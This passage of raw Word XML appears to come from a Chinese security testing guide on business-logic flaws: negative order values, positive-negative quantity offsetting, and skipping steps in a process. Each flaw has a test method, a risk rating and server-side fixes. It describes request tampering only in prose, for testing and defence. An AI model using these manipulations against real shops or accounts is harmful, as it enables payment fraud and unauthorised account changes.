        <w:t>提交订单时拦截请求，修改订单参数为负数，如商品单价、数量、总价等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734334E" w14:textId="793A28A4" w:rsidR="008C28BD" w:rsidRPr="009269F7" w:rsidRDefault="00C24790" w:rsidP="009269F7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00AA28C8" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过篡改订单参数，使得订单金额为负值，在</w:t>
      </w:r>
      <w:r w:rsidR="00AA1826" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用余额</w:t>
      </w:r>
      <w:r w:rsidR="00AA28C8" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支付时</w:t>
      </w:r>
      <w:r w:rsidR="00733D73" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>余额反而</w:t>
      </w:r>
      <w:r w:rsidR="00AA1826" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A13E0F"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD68FB4" w14:textId="51ABC85D" w:rsidR="008C28BD" w:rsidRPr="009269F7" w:rsidRDefault="00EE22AC" w:rsidP="009269F7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：未对数据进行校验，导致业务数据被污染。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53C674"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A340653" w14:textId="77777777" w:rsidR="00EE22AC" w:rsidRPr="009269F7" w:rsidRDefault="00EE22AC" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务器端在生成交易订单时，商品的价格从数据库中取出，禁止使用客户端发送的商品价格</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E38F85" w14:textId="369CF14C" w:rsidR="00EE22AC" w:rsidRPr="009269F7" w:rsidRDefault="00EE22AC" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端对客户端提交的交易数据（如商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、商品数量、商品价格等）的取值范围进行校验，将商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和商品价格与数据库中的数据对比校验，商品数量为大于零的整型数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05B46A" w14:textId="77777777" w:rsidR="00EE22AC" w:rsidRPr="009269F7" w:rsidRDefault="00EE22AC" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端在生成支付订单时，对支付订单中影响支付金额的所有因素（比如商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、商品数量、商品价格、订单编号等）进行签名，对客户端提交的支付订单进行校验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09674EE4" w14:textId="11084A44" w:rsidR="008C28BD" w:rsidRPr="00F757E4" w:rsidRDefault="00AC33EB" w:rsidP="00AC33EB">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97C5591" w14:textId="55DA3CE1" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="006F6F7B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc498434507"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正负值对冲</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="51EB5A64" w14:textId="6183BF10"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00A1576C" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序未校验订单数据的取值范围，交易存在正负值对冲。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF78971" w14:textId="77777777" w:rsidR="008C28BD" w:rsidRPr="009269F7" w:rsidRDefault="008C28BD" w:rsidP="009269F7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45783DC7" w14:textId="4F486FFA"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00D35007" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交订单</w:t>
      </w:r>
      <w:r w:rsidR="003B1A7E" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（包含多种商品）</w:t>
      </w:r>
      <w:r w:rsidR="00D35007" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时拦截请求，修改部分商品</w:t>
      </w:r>
      <w:r w:rsidR="003B1A7E" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的单价或</w:t>
      </w:r>
      <w:r w:rsidR="00D35007" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数量</w:t>
      </w:r>
      <w:r w:rsidR="003B1A7E" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，保证订单总金额为正数</w:t>
      </w:r>
      <w:r w:rsidR="00D35007" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C21414" w14:textId="42952BF4" w:rsidR="008C28BD" w:rsidRPr="009269F7" w:rsidRDefault="00C24790" w:rsidP="009269F7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="004E0AC6" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidR="00DD6F4D" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用会校验订单总金额的取值范围，所以在保证该条件满足的前提下，修改个别商品的数量，达到正负值对冲。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D890A39"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A0711" w14:textId="361B1061" w:rsidR="008C28BD" w:rsidRPr="009269F7" w:rsidRDefault="00165D05" w:rsidP="009269F7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：未对数据进行校验，导致业务数据被污染。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE19A1"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF4BA39" w14:textId="77777777" w:rsidR="00492C6F" w:rsidRPr="009269F7" w:rsidRDefault="00492C6F" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务器端在生成交易订单时，商品的价格从数据库中取出，禁止使用客户端发送的商品价格</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039913C6" w14:textId="77777777" w:rsidR="00492C6F" w:rsidRPr="009269F7" w:rsidRDefault="00492C6F" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务器端对客户端提交的交易数据（如商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、商品数量、商品价格等）的取值范围进行校验，将商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和商品价格与数据库中的数据对比校验，商品数量为大于零的整型数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87DED5" w14:textId="7497EE99" w:rsidR="008C28BD" w:rsidRDefault="00492C6F" w:rsidP="009269F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端在生成支付订单时，对支付订单中影响支付金额的所有因素（比如商品</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、商品数量、商品价格、订单编号等）进行签名，对客户端提交的支付订单进行校验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615C369" w14:textId="12587B9B" w:rsidR="00AC33EB" w:rsidRPr="009269F7" w:rsidRDefault="00AC33EB" w:rsidP="00AC33EB">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C5C517F" w14:textId="00A7D5A6" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="006F6F7B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc498434508"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务流程跳跃</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="768DA284" w14:textId="3EFBBF96"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00AC1267" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务逻辑流程分步骤进行且能越过中间校验步骤直接进行后续操作，导致中间校验等步骤失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A08EAD" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E4BE7" w14:textId="3CC7FF6F" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00AC1267" w:rsidP="00015E58">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先完成正常的业务逻辑步骤，获取每一个步骤的请求；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713C70D" w14:textId="4B360F75" w:rsidR="00AC1267" w:rsidRPr="00015E58" w:rsidRDefault="00AC1267" w:rsidP="00015E58">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过中间步骤，直接访问最后一个或几个验证请求，看是否可绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC9B8D" w14:textId="5AEBB51E" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00C24790" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00343015" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞绕过业务流程检测，</w:t>
      </w:r>
      <w:r w:rsidR="009C2313" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行非法修改他人密码等危险操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A85DB1" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F37AE" w14:textId="53266BDC" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00F926F9" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：绕过前面的校验步骤，直接跳转至后面的校验步骤</w:t>
      </w:r>
      <w:r w:rsidR="009201DE" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9F21B" w14:textId="7AA14117" w:rsidR="008C28BD" w:rsidRDefault="008C28BD" w:rsidP="00015E58">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00380434" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，在</w:t>
      </w:r>
      <w:r w:rsidR="00380434" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00380434" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中添加对每一步流程页面的校验标志位，在新步骤页面浏览过程中，仅能够顺序执行页面校验，不可进行跳步操作，例如：页面二完成后，应更新</w:t>
      </w:r>
      <w:r w:rsidR="00380434" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flag=3</w:t>
      </w:r>
      <w:r w:rsidR="00380434" w:rsidRPr="00015E58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则仅能够打开页面三。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678AA121" w14:textId="43A3F933" w:rsidR="00AC33EB" w:rsidRPr="00015E58" w:rsidRDefault="00AC33EB" w:rsidP="00015E58">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9B899F9" w14:textId="4BB396E7" w:rsidR="00D2081F" w:rsidRPr="00AD537C" w:rsidRDefault="00D2081F" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc498434509"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>业务功能失效</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="05C3A384" w14:textId="65093622" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="00D2081F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
